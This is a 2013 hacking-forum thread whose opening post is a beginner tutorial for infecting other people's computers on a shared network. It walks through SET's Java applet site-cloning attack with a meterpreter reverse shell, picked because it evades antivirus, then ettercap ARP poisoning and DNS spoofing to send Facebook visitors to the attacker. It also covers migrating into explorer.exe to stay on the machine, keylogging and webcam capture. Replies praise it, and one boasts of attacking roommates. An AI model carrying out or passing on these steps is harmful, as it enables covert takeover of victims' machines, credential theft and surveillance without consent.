+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Tutorial Infection on LAN without sending files (/Thread-Tutorial-Infection-on-LAN-without-sending-files--20181)
Infection on LAN without sending files - Crypt - 11-16-2013
My favorite program by far is SET (which stands for social engineering toolkit). It's super easy to use, and gives magnificent results.
There are multiple methods of using SET. The one I will explain to you is my favorite. Basically it will copy a website and make it so that when anyone on your network visits this website, they will go to your website instead with the virus on it! If you use this method, it's best to use sites like facebook or other ones that people frequently use.
OK on with the tutorial.
In this method, we will be using:
- Terminal in Backtrack 5 (preferably R3)
- The Social Engineering Toolkit (SET)
First start SET by going to the top right of the backtrack window onto the "Applications button", from there click "Exploitation Tools", then "Social Engineering" and then click "set". If there are two, click the top one.
Then we will type in 2 (Website Attack Vectors)
Please note that like I said SET is probably the easiest to use tool on backtrack. From this menu, you can experiment. I will explain some of the options here.
-Java Applet Attack - Clones a site then when someone visits the site, it prompts them to run a java file. Then it will infect the victim's computer and you will be able to control it
-Metasploit Browser Exploit - This will use metasploit (my second favourite tool on backtrack) to create a server. When the victim's computer connects to the server (by typing in your ip), they will be infected and you will be able to take control of their computer. This one is only ok because you have to somehow convince the victim to type in your ip in the address bar. Ex. 192.168.1.124:8080
-Credential Harvester Attack - This is probably the best one to use if you just want to get their facebook/gmail/whatever passwords. Basically it'll clone a site login page. When people visit it (by typing in your ip address) they will see the login page and probably try to log in. Backtrack will copy what they typed in (their username and password) and send it back to you.
I will not explain the other ones as they are more complicated and not suited for a tut that was made for newbs.
Then we will wait for it to load. Once it loads it will bring up a menu with a bunch of options. We will type in "1" without the brackets
Then we will type in "1" (The Java Applet Attack Method).
It will then display some options. We will use number 2 (site cloner)
Type in the required information that it prompts you to enter.
When it asks which site you would like to clone, type in a site that you think your victims use a lot. Ex. http://www.facebook.com
When it asks to enter in your ip for the reverse connection, open up a terminal (on the main page of backtrack at the top, has a little picture of a black window) and type in
Code:
ifconfigWhen it asks if you use nat/portforwarding enter in no or n.
When it asks what port to run it on type in a random port. I use port 4444.
When it asks what payload to generate, use number 14 because it is AV safe (Anti-virus undetectable)
When it asks what type of meterpreter session to use (there will be 3 options) type in number 1
When all that is done, press enter and it will start doing it's thing.
Meanwhile, we will open up a terminal and type in:
Code:
gedit /usr/local/share/ettercap/etter.dnsScroll down to the part near the top where it says "Microsoft Sucks"
You will see a part of it that says something like this
"microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
http://www.microsoft.com PTR 198.182.196.56
we need to change the microsoft.com's to the website that the victim will be visiting (Ex. Facebook) and we need to change the ip addresses to the ip address that we got when we entered ifconfig.
Here is an example
"facebook.com A 192.168.1.124
*.facebook.com A 192.168.1.124
http://www.facebook.com PTR 192.168.1.124
This step is ESSENTIAL for any of this to work!
We will save the file by clicking the button at the top that says save, then we will close the window. We will then open up a new terminal and enter in
Code:
ettercap -Tqi eth0 -P dns_spoof -M ARP // //Try this ONLY if the one above didn't work
Code:
ettercap -Tqi wlan0 -P dns_spoof -M ARP // //Go back to our SET terminal and see if it is done. It is done when it starts making a list of gibberish and says starting the payload handler.
Minimize all of this then go to http://www.facebook.com on your normal computer (or whatever site you used). (We are doing this to test if it works, this will work on any computer in your network) You should be prompted to run a java plugin. Run it this time and click run on the popup window. Then return to the SET terminal.
It should have started spouting a bunch of crap. Wait until it says, finished migrating or something along those lines. This means that you have successfully infected the victim's computer.
To interact with the victim's computer first type in
Code:
sessions -lType in
Code:
sessions -i 1BOOM! We now have control over the victim's computer
Google meterpreter commands to see what you can do once at this stage.
To ensure that the victim stays infected, we are going to migrate our server to the explorer.exe task on the victim's computer. This way, they can only get us out if they restart their computer or something.
To do this first type in
Code:
psGo back down and type in
Code:
migrate numberthatyouremembered
Ex. migrate 3968Wait until it says migration completed successfully
You may now use commands for the meterpreter
4 useful commands are
Code:
keyscan_start (starts a keylogger)
keyscan_dump (shows you what they have typed)
webcam_snap (takes a picture with the webcam and saves it to the computer)
getuid (Shows you the name of the computer and the name of the user)THIS IS JUST THE TIP OF THE ICEBERG! IF YOU ENJOYED THIS TUT OR FOUND IT USEFUL, PLEASE COMMENT.
ALSO DON'T HESITATE TO LET ME KNOW IF SOMETHING ISN'T WORKING FOR YOU OR ONE OF MY CODES HAS A TYPO OR SOMETHING.
THIS WAS NOT COPIED AND PASTED FROM ANOTHER USER, IT SEEMS THAT MY TUTORIAL ORIGINALITY IS OFTEN QUESTIONED, IF YOU COPY THIS, GIVE ME CREDIT AT LEAST!
Posting in this thread to keep it alive is as easy as clicking this link. Please do so.
Thanks
Infection on LAN without sending files - Adorapuff - 11-17-2013
This is a great tutorial, but I recommend changing the topic to DNS Spoofing Tutorial. Very long and informative. Great job. This can be done on Android with network spoofer. It uses ARP poisoning.
RE: Infection on LAN without sending files - Crypt - 11-17-2013
(11-17-2013, 04:37 PM)Putin Wrote: This is a great tutorial, but I recommend changing the topic to DNS Spoofing Tutorial. Very long and informative. Great job. This can be done on Android with network spoofer. It uses ARP poisoning.
Thank you
I'm glad you find it informative.
RE: Infection on LAN without sending files - maxjms4 - 11-29-2013
thanks for the tut love it
keep up
RE: Infection on LAN without sending files - Silky - 02-06-2014
Nice tut, but I like my little (big) Python http redirect script that sets up a transparent proxy combined with BeEF. My roommates don't stand a chance!
Kind of like what Adorapuff mentioned which you can do in dSploit, but I despise Java which is what their transparent proxy is in and wanted to make the process quicker on my laptop.